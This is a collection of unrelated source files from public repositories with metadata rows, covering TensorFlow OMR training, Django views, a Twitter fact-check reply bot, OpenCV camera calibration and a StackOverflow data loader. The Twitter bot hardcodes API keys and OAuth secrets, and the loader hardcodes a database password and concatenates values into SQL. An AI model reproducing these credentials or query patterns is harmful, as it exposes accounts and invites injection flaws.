flags.DEFINE_integer(
'exports_to_keep', 10,
'Keep the last N saved models (exported on each eval) before deleting'
' previous exports.')
@memoize.MemoizedFunction
def read_patch_dimensions():
"""Reads the dimensions of the input patches from disk.
Parses the first example in the training set, which must have "height" and
"width" features.
Returns:
Tuple of (height, width) read from disk, using the glob passed to
--train_input_patches.
"""
for filename in file_io.get_matching_files(FLAGS.train_input_patches):
# If one matching file is empty, go on to the next file.
for record in tf_record.tf_record_iterator(filename):
example = tf.train.Example.FromString(record)
# Convert long (int64) to int, necessary for use in feature columns in
# Python 2.
patch_height = int(example.features.feature['height'].int64_list.value[0])
patch_width = int(example.features.feature['width'].int64_list.value[0])
return patch_height, patch_width
def input_fn(input_patches):
"""Defines the estimator input function.
Args:
input_patches: The input patches TFRecords pattern.
Returns:
A callable. Each invocation returns a tuple containing:
* A dict with a single key 'patch', and the patch tensor as a value.
* A scalar tensor with the patch label, as an integer.
"""
patch_height, patch_width = read_patch_dimensions()
dataset = tf.data.TFRecordDataset(file_io.get_matching_files(input_patches))
def parser(record):
"""Dataset parser function.
Args:
record: A single serialized Example proto tensor.
Returns:
A tuple of:
* A dict of features ('patch' and 'weight')
* A label tensor (int64 scalar).
"""
feature_types = {
'patch':
tf.FixedLenFeature((patch_height, patch_width), tf.float32),
'label':
tf.FixedLenFeature((), tf.int64),
}
if FLAGS.use_included_label_weight:
feature_types['label_weight'] = tf.FixedLenFeature((), tf.float32)
features = tf.parse_single_example(record, feature_types)
label = features['label']
weight = label_weights.weights_from_labels(label)
if FLAGS.use_included_label_weight:
# Both operands must be the same type (float32).
weight = tf.to_float(weight) * tf.to_float(features['label_weight'])
patch = _augment(features['patch'])
return {'patch': patch, WEIGHT_COLUMN_NAME: weight}, label
return batches.get_batched_tensor(dataset.map(parser))
def _augment(patch):
"""Performs multiple augmentations on the patch, helping to generalize."""
return _augment_rotation(_augment_shift(patch))
def _augment_shift(patch):
"""Augments the patch by possibly shifting it 1 pixel horizontally."""
with tf.name_scope('augment_shift'):
rand = tf.random_uniform(())
def shift_left():
return _shift_left(patch)
def shift_right():
return _shift_right(patch)
def identity():
return patch
shift_prob = min(1., FLAGS.augmentation_x_shift_probability)
return tf.cond(rand < shift_prob / 2,
shift_left,
lambda: tf.cond(rand < shift_prob, shift_right, identity))
def _shift_left(patch):
patch = tf.convert_to_tensor(patch)
return tf.concat([patch[:, 1:], patch[:, -1:]], axis=1)
def _shift_right(patch):
patch = tf.convert_to_tensor(patch)
return tf.concat([patch[:, :1], patch[:, :-1]], axis=1)
def _augment_rotation(patch):
"""Augments the patch by rotating it by a small amount."""
max_rotation_radians = math.radians(FLAGS.augmentation_max_rotation_degrees)
rotation = tf.random_uniform(
(), minval=-max_rotation_radians, maxval=max_rotation_radians)
# Background is white (1.0) but tf.contrib.image.rotate currently always fills
# the edges with black (0). Invert the patch before rotating.
return 1. - tf.contrib.image.rotate(
1. - patch, rotation, interpolation='BILINEAR')
def serving_fn():
"""Returns the ServingInputReceiver for the exported model.
Returns:
A ServingInputReceiver object which may be passed to
`Estimator.export_savedmodel`. A model saved using this receiver may be used
for running OMR.
"""
examples = tf.placeholder(tf.string, shape=[None])
patch_height, patch_width = read_patch_dimensions()
parsed = tf.parse_example(examples, {
'patch': tf.FixedLenFeature((patch_height, patch_width), tf.float32),
})
return tf.estimator.export.ServingInputReceiver(
features={'patch': parsed['patch']},
receiver_tensors=parsed['patch'],
receiver_tensors_alternatives={
'example': examples,
'patch': parsed['patch']
})
def create_patch_feature_column():
return tf.feature_column.numeric_column(
'patch', shape=read_patch_dimensions())
def train_and_evaluate(estimator):
tf.estimator.train_and_evaluate(
estimator,
tf.estimator.TrainSpec(
input_fn=lambda: input_fn(FLAGS.train_input_patches),
max_steps=FLAGS.train_max_steps),
tf.estimator.EvalSpec(
input_fn=lambda: input_fn(FLAGS.eval_input_patches),
start_delay_secs=0,
throttle_secs=FLAGS.eval_throttle_secs,
steps=FLAGS.eval_steps,
exporters=[
tf.estimator.LatestExporter(
'exporter', serving_fn,
exports_to_keep=FLAGS.exports_to_keep),
]))
| [
"ringwalt@google.com"
] | ringwalt@google.com |
f4cda7cfbff10e6395f8d6e6c27990edd2b63bb6 | 21f62465e981dcd4f9008845bc8882420a19a13e | /catalog/views.py | 9cdf7c07f8cf8025d4c2c40d7b4da82a6180a00b | [] | no_license | M-Pidlisnyi/carrent | 7674c51e170d64ef96960ffd708e43207c7ff54a | af169086db515cf50ead3bfec4fab5e968f1de96 | refs/heads/main | 2023-08-21T01:51:57.105224 | 2021-10-31T14:39:54 | 2021-10-31T14:39:54 | 404,853,562 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,661 | py | from django.db import connection
from django.shortcuts import render
from django.views import generic
from django.views.generic.edit import ModelFormMixin
from django.contrib.auth.mixins import LoginRequiredMixin
from .models import BodyStyle, Brand, Car, CarInstance
# Create your views here.
def index(request):
"""view function form home page"""
carNum = Car.objects.all().count()
instancesNum = CarInstance.objects.all().count()
availableInstances = CarInstance.objects.filter(status__exact='a').count()
brandNum = Brand.objects.all().count()
visits_num = request.session.get('visits_num', 0)
request.session['visits_num'] = visits_num + 1
context = {
'carNum': carNum,
'instancesNum': instancesNum,
'availableInstances': availableInstances,
'brandNum': brandNum,
'visits_num': visits_num
}
# Render the HTML template index.html with the data in the context variable
return render(request, 'index.html', context=context)
class CarListView(generic.ListView):
model = Car
paginate_by = 5
class CarDetailView(generic.DetailView):
model = Car
class BrandListView(generic.ListView):
model = Brand
paginate_by = 5
class BrandDetailView(generic.DetailView):
model = Brand
class OnRentView(LoginRequiredMixin, generic.ListView):
"""Generic class-based view listing cars on rent to current user."""
model = CarInstance
template_name ='catalog/on_rent_view.html'
paginate_by = 5
def get_queryset(self):
return CarInstance.objects.filter(renter=self.request.user).filter(status__exact="o").order_by("due_back") | [
"mishapropatriot@gmail.com"
] | mishapropatriot@gmail.com |
0bd393951e50fc60477ac924c0d63f8423b99e55 | fd7adeb6292d397e6ff2a599184caba4764b7a07 | /type_demo.py | 805d6356d70be9c735014abe30dbf8c207c7eb9b | [] | no_license | anajera10/mis3640 | 6614dc1df7cbd96986aae5d25ce779a140c5f853 | b3f0e809e521959184ee58473a92968db3058b69 | refs/heads/master | 2020-07-15T11:52:07.948211 | 2016-10-03T02:42:55 | 2016-10-03T02:42:55 | 67,155,427 | 1 | 1 | null | 2016-10-04T22:10:13 | 2016-09-01T18:17:57 | Python | UTF-8 | Python | false | false | 280 | py | import time
print(time.time())
current=time.time()
seconds=current//60
minutes = (current//60) % 60
hours = (current//60)//60 %24
days = current//60//60//24
print('Current time: %d days, %d hours, %d minutes and %d seconds from Epoch.' % (days,hours,minutes,seconds))
| [
"anajera1@babson.edu"
] | anajera1@babson.edu |
cde0aad40d03ea9899b0f744cc12725d618b2812 | 7cfcc4bf9b2d63240615719e2b81759710e17cb5 | /twitter_bot.py | 773739d7beb90349bd08e581d0d7d965ef3d007d | [] | no_license | r3glus/4app | c168ea5cc682f74d28b0ec337a7a4dfdc24b156b | 60b7cb6578f426af1ffafbb134b8de9824e204f9 | refs/heads/master | 2020-12-05T16:38:16.149438 | 2020-03-18T15:58:01 | 2020-03-18T15:58:01 | 232,175,214 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,517 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import random
import time
import gspread
import schedule
from oauth2client.service_account import ServiceAccountCredentials
from twython import Twython, TwythonError, TwythonStreamer
print("Listening for tweets containing the hashtag")
APP_KEY = "kau0g8qYQtMRK0w41GXoSayx0"
APP_SECRET = "jY6W7tWzJKCwpPJylbC46YS4kKluck9nLMaAmZlHuxYte1ce8n"
OAUTH_TOKEN = "1141000476206481408-G8Buwan7GPbXegsL63TJ8r2MaNFjYZ"
OAUTH_TOKEN_SECRET = "DJzTQWyP6K5pOPg3mNbF5wSNOovmNs9v8gXaBziOjniu6"
def twitter_api():
""" Authenticate credentials"""
twitter = Twython(APP_KEY, APP_SECRET, OAUTH_TOKEN, OAUTH_TOKEN_SECRET)
return twitter
def spreadsheet():
scope = ['https://spreadsheets.google.com/feeds',
'https://www.googleapis.com/auth/drive']
creds = ServiceAccountCredentials.from_json_keyfile_name(
'Reglus-bot.json', scope)
client = gspread.authorize(creds)
sheet = client.open("Reglus Heroku").sheet1
return sheet
def get_all_records():
sheet = spreadsheet()
return sheet.get_all_records()
def get_fake_news_url():
sheet = spreadsheet()
records = sheet.get_all_records()
urls = [url.get('FAKE NEWS URL') for url in records]
print(urls)
return urls
def reply(data):
api = twitter_api()
all_records = get_all_records()
handle = data.get('user').get('screen_name')
fake_news_url = data.get('entities').get('urls')[0].get('url')
for record in all_records:
if fake_news_url in record.values():
reply_text = "Olá @{handle} O link que você compartilhou não parece ser uma notícia verdadeira! Verifique este link {record.get('DEBUNKING')}"
break
try:
tweet_id = data.get('id')
time.sleep(2)
api.update_status(status=reply_text, in_reply_to_status_id=tweet_id)
print("Tweet successfully sent!")
time.sleep(1)
except TwythonError as e:
print(e)
class MyStreamer(TwythonStreamer):
def on_success(self, data):
tweetText = data.get('text')
print(tweetText)
reply(data)
def on_error(self, status_code, data):
print("Twitter Error Status code", status_code)
# self.disconnect()
stream = MyStreamer(APP_KEY, APP_SECRET,
OAUTH_TOKEN, OAUTH_TOKEN_SECRET)
links = get_fake_news_url()
stream.statuses.filter(track=links)
| [
"noreply@github.com"
] | r3glus.noreply@github.com |
e8c4fe4fed8dad5083d035e6827ae056a6b8a943 | 739972eef4848f757b42acf2e29ebfe94a00d57b | /build/learning_service/catkin_generated/pkg.installspace.context.pc.py | 2167ee1ea8e826d2ab4ad97080a496b84a503ea8 | [] | no_license | sxs505/Logistics-car-rplidar | 5a01b5bc256de350579d41b87dc1d0c8da18c5c0 | 0baa4c7dd4e12f2df4a3b0434afbd4aeab7b94c9 | refs/heads/main | 2023-04-03T10:48:53.566195 | 2021-04-14T03:16:49 | 2021-04-14T03:16:49 | 338,500,084 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 389 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "learning_service"
PROJECT_SPACE_DIR = "/home/pathfinder/catkin_rplidar/install"
PROJECT_VERSION = "0.0.0"
| [
"51873335+sxs505@users.noreply.github.com"
] | 51873335+sxs505@users.noreply.github.com |
1c826dd9083be24361ca5ba352a9ebe31ae329f1 | fced880ea501c2eb69edbf9f9ee8286f3a6f3899 | /account/urls.py | 9e8fc581091e0872f0695627f7c88d28bf65e985 | [] | no_license | Oluwaniphise/Qna | 37cd3919bd0d5d09e6854d8af4a3f92a9ca06014 | c43976f73f3133fe0f7a03b5f333a2c85f1d0f4c | refs/heads/master | 2023-04-26T13:44:38.786201 | 2020-11-30T08:22:02 | 2020-11-30T08:22:02 | 308,851,239 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 396 | py | from django.urls import path
from . import views
from django.contrib.auth import views as auth_views
urlpatterns = [
path('registration/', views.register, name='register'),
path('login/', views.user_login, name="login"),
path('logout/', auth_views.LogoutView.as_view(template_name="account/logout.html"), name='logout'),
path('dashboard/', views.dashboard, name="dashboard"),
] | [
"oduyaleenoch@gmail.com"
] | oduyaleenoch@gmail.com |
04b61e88739ffadc8d675c0b4f576b5f7122eb69 | 576cc83449e10fd3f98281970c46016ea7a5aea2 | /OpenCV相机标定/CalibrationTest.py | 658370ca975416804ff63dff37187d3bdaa30be3 | [] | no_license | HotView/PycharmProjects | 215ab9edd341e3293daebcf86d97537f8cd28d75 | 61393fe5ba781a8c1216a5cbe7e0d06149a10190 | refs/heads/master | 2020-06-02T07:41:53.608742 | 2019-11-13T08:31:57 | 2019-11-13T08:31:57 | 191,085,178 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,778 | py | import cv2
import numpy as np
import glob
# termination criteria
criteria = (cv2.TERM_CRITERIA_EPS+cv2.TERM_CRITERIA_MAX_ITER,30,0.001)
# prepare objects points,like(0,0,0),(1,0,0),(2,0,0),....,(6,5,0)
objp = np.zeros((6*7,3),np.float32)
objp[:,:2] = np.mgrid[0:7,0:6].T.reshape(-1,2)
# Arrays to store object points and points from all the images.
objpoints = []
imgpoints = []
images = glob.glob('image/*.jpg')
for fname in images:
img = cv2.imread(fname)
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
#Find the chess board coners,按照行或者列连接,(7,6)就是7个连成一条线
ret,corners = cv2.findChessboardCorners(gray,(7,6),None)
#如果找出了角点,添加对象点和图像点
if ret:
objpoints.append(objp)
corners2 = cv2.cornerSubPix(gray,corners,(11,11),(-1,-1),criteria)
print("corners2",corners2)
imgpoints.append(corners2)
#绘制和展示角点,按照颜色来进行划分(7,6),6种颜色
#橙红色的为0号点,蓝色的为最后的点集
img = cv2.drawChessboardCorners(img,(7,6),corners2,ret)
for i,p in enumerate(corners2):
x = int(p[0][0])
y = int(p[0][1])
cv2.putText(img,str(i),(x,y),cv2.FONT_HERSHEY_SIMPLEX,0.5,(255,255,255),2)
cv2.imshow(fname,img)
rmse, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, gray.shape[::-1], None, None)
h,w = gray.shape[:2]
imgsize = (w,h)
mtx2, roi=cv2.getOptimalNewCameraMatrix(mtx,dist,imgsize,alpha=0,
centerPrincipalPoint=True)
print("#######")
print(dist)
#np.savez("pose",mtx = mtx,dist = dist,newmtx = mtx2)
print(mtx,dist,mtx2)
with open('pose.py', 'wb') as fout:
fout.write(b'import numpy as np\n')
fout.write(b'\n')
fout.write(b'rmse = %r\n' % rmse)
fout.write(b'distortion_coefficients = np.array(%r, dtype=np.float32)\n'
% dist.tolist())
fout.write(b'raw_camera_matrix = np.array(%r, dtype=np.float32)\n'
% mtx.tolist())
fout.write(b'undistort_camera_matrix = np.array(%r, dtype=np.float32)\n'
% mtx2.tolist())
fout.write(b'roi = %d, %d, %d, %d\n'% roi)
fout.write(b'image_size = %d, %d\n' % imgsize)
print(roi)
print("----------------")
print(ret)
print("-----------")
print(mtx)
print("-----------")
matinv = np.linalg.inv(mtx)
print(matinv)
print("################################")
print(np.dot(mtx,matinv))
mean_error = 0
for i in range(len(objpoints)):
imgpoints2, _ = cv2.projectPoints(objpoints[i], rvecs[i], tvecs[i], mtx, dist)
error = cv2.norm(imgpoints[i],imgpoints2, cv2.NORM_L2)/len(imgpoints2)
mean_error += error
print ("total error: ", mean_error/len(objpoints))
cv2.waitKey(0)
| [
"864773190@qq.com"
] | 864773190@qq.com |
ad3d49da1f96ec35902d7ff0d230fa6096b9aa03 | 6e02de993bb3b732917e050ce5b1def91d8793e5 | /chapter5/P06.py | ee13034b44b08062322f63dccc441a645e018670 | [] | no_license | AKATSUKIKOJYO/MyPython | 0d7d9047ef8ead500e478d14eed8f6ed7ef61499 | 4ab35c46972fc77a6b8af0410061a84e53e5b55c | refs/heads/master | 2020-04-11T15:12:36.996625 | 2018-12-29T07:53:59 | 2018-12-29T07:53:59 | 161,883,486 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 209 | py | year = int(input("연도를 입력하세요:" ))
if year % 4 == 0 and year % 100 !=0 or year % 400 == 0:
print ("입력한", year, "는 윤년입니다.")
else:
print("윤년이 아닙니다.")
| [
"noreply@github.com"
] | AKATSUKIKOJYO.noreply@github.com |
3213770d3cda61d88024781056c3c6c001116e1f | c4cd7c5971c4b889d638fe70c52c53a5800b1bfa | /NS3-Assignment/plot/plot2c.py | 2b90f96bf1c86dbfed6a42542038bd0deeee8bc9 | [] | no_license | AkshitKumar/EE5150 | 59893f9c5efc61e75328872364d4e7a2cde7ad3f | 806fe73cb939e9766dad58c3a3de93390bece595 | refs/heads/master | 2021-09-15T04:02:11.903235 | 2018-05-25T09:42:48 | 2018-05-25T09:42:48 | 102,965,182 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 435 | py | import matplotlib.pyplot as plt
import numpy as np
data = np.loadtxt('../data/distance.txt')
data = np.transpose(data)
y_axis = data[1]
x_axis = data[0]
plt.figure()
plt.plot(x_axis,y_axis,x_axis,y_axis,'bx')
plt.xticks(x_axis)
plt.xlabel(r'Distance between AP and Client (in meters)')
plt.ylabel(r'Throughput (in Mbps)')
plt.title(r'Throughtput for different values of distance between AP and client for TCP')
plt.grid()
plt.show() | [
"akshitkumar100@gmail.com"
] | akshitkumar100@gmail.com |
86dbc216f00b25140e5fd984ac271fd810b3caec | b1270c4179f18f83edcf8be7720454614a551b45 | /so_RQ/code/lib/load_data.py | e67ad6c7d521ab3866cca71c0f0a88ad1ad0fae1 | [] | no_license | WISDelft/SODA | f3e4059a2f41cb0cd0516215bcddf62f62683505 | 04484b34d4f25999b515e3fb239850c0bdae7ccd | refs/heads/master | 2021-01-17T08:53:39.159344 | 2015-02-03T13:51:45 | 2015-02-03T13:51:45 | 17,405,793 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,888 | py | import string
import psycopg2
import sys
import pickle
import os
import numpy as np
import copy
con = None
con = psycopg2.connect(database='stackquestionstest', user='postgres', password='wistudelft')
cur = con.cursor()
cur.execute('SELECT version()')
ver = cur.fetchone()
'''
load training data
'''
def load_train_data(option='na'):
at_NoAnswer = dict([])
at_NoVotes = dict([])
at_MEC_quantities = dict([])
at_NoComment_q = dict([])
at_NoCommentVotes_q = dict([])
at_NoComment_a = dict([])
at_NoCommentVotes_a = dict([])
## export the data from database
if option=='train':
cur.execute("select id from questions where TO_CHAR (creationdate,'YYYY-MM-DD') < '2012-07-01'")
else:
cur.execute("select id from questions where TO_CHAR (creationdate,'YYYY-MM-DD') < '2013-01-01'")
results = cur.fetchall()
'''for rs in results:
qid = rs[0]
if qid == None:
continue
##### activeness, expertise #####
if option=='train':
cur.execute("select aowneruserid, ascore, qtags from sim_qa where qid = "+str(qid)+" and TO_CHAR (acreationdate,'YYYY-MM-DD') < '2012-07-01'")
else:
cur.execute("select aowneruserid, ascore, qtags from sim_qa where qid = "+str(qid)+" and TO_CHAR (acreationdate,'YYYY-MM-DD') < '2013-01-01'")
aresults = cur.fetchall()
if aresults == None or len(aresults) ==0:
continue
qtags = []
try:
for t in aresults[0][2].split('|'):
qtags.append(t)
except:
print aresults
if len(qtags) == 0:
continue
mec_quantities = []
for ar in aresults:
ascore = ar[1]
aowneruserid = ar[0]
mec_quantities.append([aowneruserid, ascore])
for t in qtags:
if (aowneruserid, t) in at_NoAnswer:
at_NoAnswer[(aowneruserid, t)] += 1
at_NoVotes[(aowneruserid, t)] += ascore
else:
at_NoAnswer[(aowneruserid, t)] = 1
at_NoVotes[(aowneruserid, t)] = ascore
mec_quantities = sorted(mec_quantities, key = lambda mec_quantities : mec_quantities[1], reverse=True)
rank = 1
for mq in mec_quantities:
aowneruserid = mq[0]
for t in qtags:
if (aowneruserid, t) in at_MEC_quantities:
at_MEC_quantities[(aowneruserid, t)].append([rank,len(mec_quantities)])
else:
at_MEC_quantities[(aowneruserid, t)] = [[rank,len(mec_quantities)]]
rank += 1'''
for rs in results:
qid = rs[0]
if qid == None:
continue
##### participation #####
if option=='train':
cur.execute("select cuserid, cscore, qtags from sim_cqa where qid = "+str(qid)+" and cuserid <> qowneruserid and cuserid<>aowneruserid and TO_CHAR (ccreationdate,'YYYY-MM-DD') < '2012-07-01'")
else:
cur.execute("select cuserid, cscore, qtags from sim_cqa where qid = "+str(qid)+" and cuserid <> qowneruserid and cuserid<>aowneruserid and TO_CHAR (ccreationdate,'YYYY-MM-DD') < '2013-01-01'")
caresults = cur.fetchall()
if caresults == None or len(caresults) ==0:
continue
qtags = []
try:
for t in caresults[0][2].split('|'):
qtags.append(t)
except:
print caresults
if len(qtags) == 0:
continue
for car in caresults:
cascore = car[1]
if cascore == None:
cascore = 0
causerid = car[0]
for t in qtags:
if (causerid, t) in at_NoComment_a:
at_NoComment_a[(causerid, t)] += 1
at_NoCommentVotes_a[(causerid, t)] += cascore
else:
at_NoComment_a[(causerid, t)] = 1
at_NoCommentVotes_a[(causerid, t)] = cascore
for rs in results:
qid = rs[0]
if qid == None:
continue
if option=='train':
cur.execute("select cuserid, cscore, qtags from sim_cq where qid = "+str(qid)+" and cuserid<>qowneruserid and TO_CHAR (ccreationdate,'YYYY-MM-DD') < '2012-07-01'")
else:
cur.execute("select cuserid, cscore, qtags from sim_cq where qid = "+str(qid)+" and cuserid<>qowneruserid and TO_CHAR (ccreationdate,'YYYY-MM-DD') < '2013-01-01'")
cqresults = cur.fetchall()
if cqresults == None or len(cqresults) ==0:
continue
qtags = []
try:
for t in cqresults[0][2].split('|'):
qtags.append(t)
except:
print cqresults
if len(qtags) == 0:
continue
for cqr in cqresults:
cqscore = cqr[1]
if cqscore == None:
cqscore = 0
cquserid = cqr[0]
for t in qtags:
if (cquserid, t) in at_NoComment_q:
at_NoComment_q[(cquserid, t)] += 1
at_NoCommentVotes_q[(cquserid, t)] += cqscore
else:
at_NoComment_q[(cquserid, t)] = 1
at_NoCommentVotes_q[(cquserid, t)] = cqscore
## add to data structure
mec = []
mec_log = []
mec_naive = []
zscore = []
exp_data_repu = []
exp_data_repu_norm = []
act_data = []
'''for ut in at_NoAnswer:
if ut[0] == None:
continue
exp_data_repu.append((ut[0],ut[1], at_NoVotes[(ut[0],ut[1])]))
exp_data_repu_norm.append((ut[0],ut[1], float(at_NoVotes[(ut[0],ut[1])])/at_NoAnswer[(ut[0],ut[1])]))
act_data.append((ut[0],ut[1], at_NoAnswer[(ut[0],ut[1])]))
for ut in at_MEC_quantities:
if ut[0] == None:
continue
#if ut[0]==616639 and ut[1]=='hacking':
#print at_MEC_quantities[(ut[0],ut[1])]
mec_mec_quantities = at_MEC_quantities[(ut[0],ut[1])]
iranks_naive = [float(1)/r[0] for r in mec_mec_quantities]
iranks = [float(r[1])/r[0] for r in mec_mec_quantities]
iranks_log = [np.log2(r[1])/r[0] for r in mec_mec_quantities]
mec_naive.append((ut[0],ut[1], np.mean(iranks_naive)))
mec.append((ut[0],ut[1], np.mean(iranks)))
mec_log.append((ut[0],ut[1], np.mean(iranks_log)))
#if ut[0]==616639 and ut[1]=='hacking':
#sys.exit(1)'''
parti_act_data = []
parti_exp_data = []
for ut in at_NoComment_a:
if ut[0] == None:
continue
if ut in at_NoComment_q:
parti_act_data.append((ut[0],ut[1], at_NoComment_a[(ut[0],ut[1])]+at_NoComment_q[(ut[0],ut[1])]))
parti_exp_data.append((ut[0],ut[1], at_NoCommentVotes_a[(ut[0],ut[1])]+at_NoCommentVotes_q[(ut[0],ut[1])]))
else:
parti_act_data.append((ut[0],ut[1], at_NoComment_a[(ut[0],ut[1])]))
parti_exp_data.append((ut[0],ut[1], at_NoCommentVotes_a[(ut[0],ut[1])]))
for ut in at_NoComment_q:
if ut[0] == None:
continue
if ut in at_NoComment_a:
continue
parti_act_data.append((ut[0],ut[1], at_NoComment_q[(ut[0],ut[1])]))
parti_exp_data.append((ut[0],ut[1], at_NoCommentVotes_q[(ut[0],ut[1])]))
return exp_data_repu, exp_data_repu_norm, act_data, mec_naive, mec, mec_log, parti_act_data, parti_exp_data
def load_train_data_old(expertise_option='novotes'):
    """Fetch training triples from the qr_ut_matrix_train table.

    Rows whose third column is zero are skipped, and triples
    (user, tag, expertise) are collected only when *expertise_option*
    is 'novotes' (the sole option this legacy loader supports).
    """
    cur.execute("select * from qr_ut_matrix_train")
    rows = cur.fetchall()
    return [(row[0], row[1], row[3])
            for row in rows
            if row[2] != 0 and expertise_option == 'novotes']
'''
for each question posted after 2013-01-01:
get the ranked list of answerers
get the tags
'''
def load_test_data(option='na'):
    """Collect test questions together with their tags and ranked answerers.

    With option == 'train' the questions created in [2012-07-01, 2013-01-01)
    are selected; otherwise all questions from 2013-01-01 onwards.  Each
    returned element is [question_id, tag_list, ranked_answerers], where
    ranked_answerers is a list of [user_id, score] pairs sorted by score,
    highest first.
    """
    if option == 'train':
        cur.execute("select id from questions where TO_CHAR (creationdate,'YYYY-MM-DD') < '2013-01-01' and TO_CHAR (creationdate,'YYYY-MM-DD') >= '2012-07-01'")
    else:
        cur.execute("select id from questions where TO_CHAR (creationdate,'YYYY-MM-DD') >= '2013-01-01'")
    qinfos = []
    for row in cur.fetchall():
        qid = row[0]
        if qid is None:
            continue
        cur.execute("select aowneruserid, ascore, qtags from sim_qa where qid = "+str(qid))
        aresults = cur.fetchall()
        if not aresults:
            continue
        try:
            qtags = [t for t in aresults[0][2].split('|')]
        except:
            qtags = []
            print(aresults)
        if len(qtags) == 0:
            continue
        # Rank the answerers of this question by answer score, descending.
        qrank = sorted([[ar[0], ar[1]] for ar in aresults],
                       key=lambda pair: pair[1], reverse=True)
        qinfos.append([qid, qtags, qrank])
    return qinfos
def check_date_(qid, date):
    """Return True if question *qid* has at least one answer created before *date*.

    :param qid: numeric question id.
    :param date: 'YYYY-MM-DD' string used as an exclusive upper bound.

    NOTE(review): the SQL is assembled by string concatenation; this is safe
    only while qid/date are internally generated -- switch to bind parameters
    if these values ever come from outside.
    """
    cur.execute("select qid from sim_qa where qid="+str(qid)+" and TO_CHAR(acreationdate,'YYYY-MM-DD') <'" + date +"'")
    # fetchone() returns None when no row matched the query.
    return cur.fetchone() is not None
def data_filter_single(exp_data, act_data, test_data):
    """Restrict expertise/activity/test data to answerers seen in both sets.

    Two passes are performed:
      1. keep only answerers present in both the training (exp_data) and
         test (test_data) sets, and drop test questions left with fewer
         than 2 answerers;
      2. re-intersect, since dropping test questions may have removed some
         answerers from the test side.

    :param exp_data: list of (user, tag, expertise) training triples.
    :param act_data: list of (user, tag, activity) training triples.
    :param test_data: list of [qid, tags, [[user, score], ...]] entries.
    :return: (exp_data, act_data, test_data) filtered; inputs are not mutated.
    """
    train_u = set([r[0] for r in exp_data])
    print('#answerers in Training data: '+str(len(train_u)))
    test_u = set([u[0] for qi in test_data for u in qi[2]])
    print('#answerers in Test data: '+str(len(test_u)))
    intersect_u = train_u.intersection(test_u)
    print('#answerers in both sets: '+str(len(intersect_u)))
    # First pass: drop everything outside the intersection.
    exp_data = [r for r in exp_data if r[0] in intersect_u]
    act_data = [r for r in act_data if r[0] in intersect_u]
    test_data_new = []
    for r in test_data:
        # Deep-copy so the caller's test_data is left untouched.
        r_new = copy.deepcopy(r)
        r_new[2] = [us for us in r_new[2] if us[0] in intersect_u]
        if len(r_new[2]) >= 2:
            test_data_new.append(r_new)
    test_data = test_data_new
    print('AFTER the first filtering: removing the answerers not in the intersection of the two sets; delete questions<2 answerers in the test set.')
    train_u = set([r[0] for r in exp_data])
    print('#answerers in Training data: '+str(len(train_u)))
    test_u = set([u[0] for qi in test_data for u in qi[2]])
    print('#answerers in Test data: '+str(len(test_u)))
    intersect_u = train_u.intersection(test_u)
    print('#answerers in both sets: '+str(len(intersect_u)))
    # Second pass: remove training answerers no longer present in the
    # (possibly shrunken) test set.
    exp_data = [r for r in exp_data if r[0] in intersect_u]
    act_data = [r for r in act_data if r[0] in intersect_u]
    print('remaining test questions: '+str(len(test_data)))
    print('AFTER the second filtering: remove again the answerers in the training set, who do not show up in the test set.')
    train_u = set([r[0] for r in exp_data])
    print('#answerers in Training data: '+str(len(train_u)))
    test_u = set([u[0] for qi in test_data for u in qi[2]])
    print('#answerers in Test data: '+str(len(test_u)))
    intersect_u = train_u.intersection(test_u)
    print('#answerers in both sets: '+str(len(intersect_u)))
    return exp_data, act_data, test_data
def _keep_users(rows, users):
    # Helper: retain only the rows whose leading field (the user id) is in *users*.
    return [r for r in rows if r[0] in users]


def data_filter(exp_data_all, exp_data, act_data, test_data, exp_data_mec_naive, exp_data_mec, exp_data_mec_log):
    """Restrict all expertise variants, activity and test data to answerers
    present in both the training (exp_data) and test sets.

    Same two-pass scheme as data_filter_single(): (1) keep only answerers in
    the intersection of the two sets and drop test questions left with fewer
    than 2 answerers; (2) re-intersect after the test set shrank.

    :return: 7-tuple (exp_data_all, exp_data, act_data, test_data,
             exp_data_mec_naive, exp_data_mec, exp_data_mec_log) filtered;
             inputs are not mutated.
    """
    train_u = set([r[0] for r in exp_data])
    print('#answerers in Training data: '+str(len(train_u)))
    test_u = set([u[0] for qi in test_data for u in qi[2]])
    print('#answerers in Test data: '+str(len(test_u)))
    intersect_u = train_u.intersection(test_u)
    print('#answerers in both sets: '+str(len(intersect_u)))
    # First pass: drop everything outside the intersection.
    exp_data_mec = _keep_users(exp_data_mec, intersect_u)
    exp_data_mec_naive = _keep_users(exp_data_mec_naive, intersect_u)
    exp_data_mec_log = _keep_users(exp_data_mec_log, intersect_u)
    exp_data = _keep_users(exp_data, intersect_u)
    exp_data_all = _keep_users(exp_data_all, intersect_u)
    act_data = _keep_users(act_data, intersect_u)
    test_data_new = []
    for r in test_data:
        # Deep-copy so the caller's test_data is left untouched.
        r_new = copy.deepcopy(r)
        r_new[2] = [us for us in r_new[2] if us[0] in intersect_u]
        if len(r_new[2]) >= 2:
            test_data_new.append(r_new)
    test_data = test_data_new
    print('AFTER the first filtering: removing the answerers not in the intersection of the two sets; delete questions<2 answerers in the test set.')
    train_u = set([r[0] for r in exp_data])
    print('#answerers in Training data: '+str(len(train_u)))
    test_u = set([u[0] for qi in test_data for u in qi[2]])
    print('#answerers in Test data: '+str(len(test_u)))
    intersect_u = train_u.intersection(test_u)
    print('#answerers in both sets: '+str(len(intersect_u)))
    # Second pass: remove answerers no longer present after the test-set shrink.
    exp_data_mec = _keep_users(exp_data_mec, intersect_u)
    exp_data_mec_naive = _keep_users(exp_data_mec_naive, intersect_u)
